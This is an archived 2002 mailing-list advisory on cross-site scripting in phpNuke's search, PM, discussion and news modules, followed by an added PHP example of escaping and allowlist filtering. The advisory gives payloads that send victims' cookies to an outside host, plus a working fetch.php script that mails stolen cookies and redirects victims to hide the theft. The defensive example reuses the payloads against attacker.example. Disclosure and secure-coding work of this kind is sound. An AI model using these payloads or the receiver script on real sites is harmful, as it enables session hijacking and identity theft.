Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

From: Matthew Murphy (mattmurphyat_private)
Date: Sun Nov 24 2002 - 10:06:23 PST

    phpNuke Module Vulnerabilities Enable Identity Theft
    
    Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
    Risk: High
    Impact: Identity Theft/Impersonation/Privilege Elevation
    Scenario: Cross-site scripting flaws enabling cookie theft
    
    Description
    
    phpNuke is a popular and very complex content manager that runs on Unix,
    Mac, and Windows systems with a MySQL or similar backend database.  Many of
    the content manager's modules contain serious vulnerabilities that allow
    attackers to hijack or disable user accounts, and possibly gain
    administrative privileges.  Gaining such privileges could likely assist
    further compromise of the susceptible system.
    
    I. Search Module Vulnerability
    
    The search module of phpNuke applies absolutely no filtering at all when
    returning the "Results for x..." page, and as a result is susceptible to
    cross-site scripting via a simple query such as:
    
    <SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurphyat_private&ref="+document.URL+"&cookie="+document.cookie;</SCRIPT>
    
    II. Multiple Module Extended Tag Vulnerabilities
    
    phpNuke does a decent job of stripping known malicious tags, but doesn't
    take into account the fact that even "safe" tags can have malicious
    properties.  This enables cross-site scripting against the PM module,
    Discussion module, News module, etc. so basically any module that accepts
    user input for an article, message, or comment, can be attacked with HTML
    such as:
    
    <B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fetch.php?email=mattmurphyat_private&ref=\'+document.URL+\'&cookie=\'+document.cookie'))">Bold text -- or an attack?</B>
    <B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphyat_private&ref='+document.URL+'&cookie='+document.cookie">Don't Click</B>
    <B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphyat_private&ref='+document.URL+'&cookie='+document.cookie">Keep Away!</B>
    
    III. Exploit Script
    
    <?php
    // fetch.php: receives the values sent by the payloads above and mails
    // the stolen cookie to the address given in the "email" parameter.
    error_reporting(0);
    $redir_ref = TRUE;
    mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
    if ($redir_ref) {
        // Send the victim back to the page they came from so the theft is
        // not noticed. The value is sent as-is: urlencode()ing the whole URL
        // would percent-encode the scheme and slashes and break the redirect.
        header("Location: ".$_GET["ref"]);
    }
    ?>
    
    Vendor Response
    
    I've contacted www.phpnuke.org through a private message, but if anyone
    knows a more reliable contact for them, please do use it, as this is not
    likely the only route of contact.  I sent a PM to "nukelite" with an example
    exploit in it.  I expect that future BETA releases will eliminate this
    vulnerability.  I am submitting this to the list so that vulnerable
    administrators may make the necessary revisions to prevent this
    vulnerability.  The versions available for download on www.phpnuke.org, as
    well as the version deployed there, remain vulnerable at the time of this
    writing.
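The following is an added example, not code from the advisory or from phpNuke itself. It shows why the "strip known malicious tags" approach described in section II fails against the attribute-based payloads, and what survives them: escaping the echoed search term from section I with htmlspecialchars(), and filtering user-supplied markup with a tag allowlist that rebuilds every kept tag without attributes. The function names, the blacklist used to model the flawed filter, and the host attacker.example in the constructed payloads are all assumptions made for this example; phpNuke's real filtering code is not reproduced here.

```php
<?php
// Added example (not phpNuke's own code). Contrasts a tag blacklist of the
// kind the advisory describes with an attribute-dropping tag allowlist.

// Section I: the search module echoes the query verbatim. For an HTML text
// context, escaping the value is the whole fix.
function render_search_heading(string $query): string {
    return 'Results for ' . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . '...';
}

// Hypothetical blacklist filter modelling the class of bug in section II:
// it removes tags it knows to be dangerous but leaves "safe" tags, and all
// of their attributes, untouched.
function blacklist_filter(string $html): string {
    $bad = ['script', 'iframe', 'object', 'embed'];
    foreach ($bad as $tag) {
        $html = preg_replace('#</?' . $tag . '\b[^>]*>#i', '', $html);
    }
    return $html;
}

// Allowlist filter: keep a few formatting tags, rebuild each one with no
// attributes at all (so ONCLICK, ONMOUSEOVER and STYLE can never survive),
// and drop every other tag while keeping its text content.
function allowlist_filter(string $html): string {
    $allowed = ['b', 'i', 'u', 'p', 'br'];
    return preg_replace_callback(
        '#<\s*(/?)\s*([a-z0-9]+)\b[^>]*>#i',
        function (array $m) use ($allowed): string {
            $close = $m[1];
            $tag   = strtolower($m[2]);
            if (!in_array($tag, $allowed, true)) {
                return '';                   // unknown tag: removed entirely
            }
            return '<' . $close . $tag . '>'; // allowed tag: attributes gone
        },
        $html
    );
}

// Constructed payloads in the shape of the advisory's, pointed at an
// assumed attacker host rather than the one in the original post.
$payloads = [
    '<SCRIPT>location.href="http://attacker.example/fetch.php?cookie="+document.cookie;</SCRIPT>',
    '<B ONCLICK="location.href=\'http://attacker.example/fetch.php?cookie=\'+document.cookie">Don\'t Click</B>',
    '<B ONMOUSEOVER="location.href=\'http://attacker.example/fetch.php?cookie=\'+document.cookie">Keep Away!</B>',
    '<B STYLE="left:expression(eval(\'location.href=&quot;http://attacker.example/&quot;\'))">Bold text -- or an attack?</B>',
];

foreach ($payloads as $p) {
    echo "input:     $p\n";
    echo "blacklist: " . blacklist_filter($p) . "\n";   // <B ...> payloads pass through unchanged
    echo "allowlist: " . allowlist_filter($p) . "\n";   // only bare <b>...</b> remains
    echo "\n";
}

// Section I fix: the query is rendered, never interpreted.
echo render_search_heading($payloads[0]) . "\n";
```

Running this shows the blacklist stripping only the `<SCRIPT>` case while every `<B ...>` payload comes out exactly as it went in, whereas the allowlist reduces all four to plain bold text. Two caveats for anyone adapting this: the regex-based allowlist is a demonstration of the principle, and a real deployment should use a parser-based sanitizer rather than regular expressions; and text content that is not a tag is passed through unescaped here, so the output still belongs only in an HTML body context, never inside an attribute or a script block.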
    



    This archive was generated by hypermail 2b30 : Mon Nov 25 2002 - 19:59:36 PST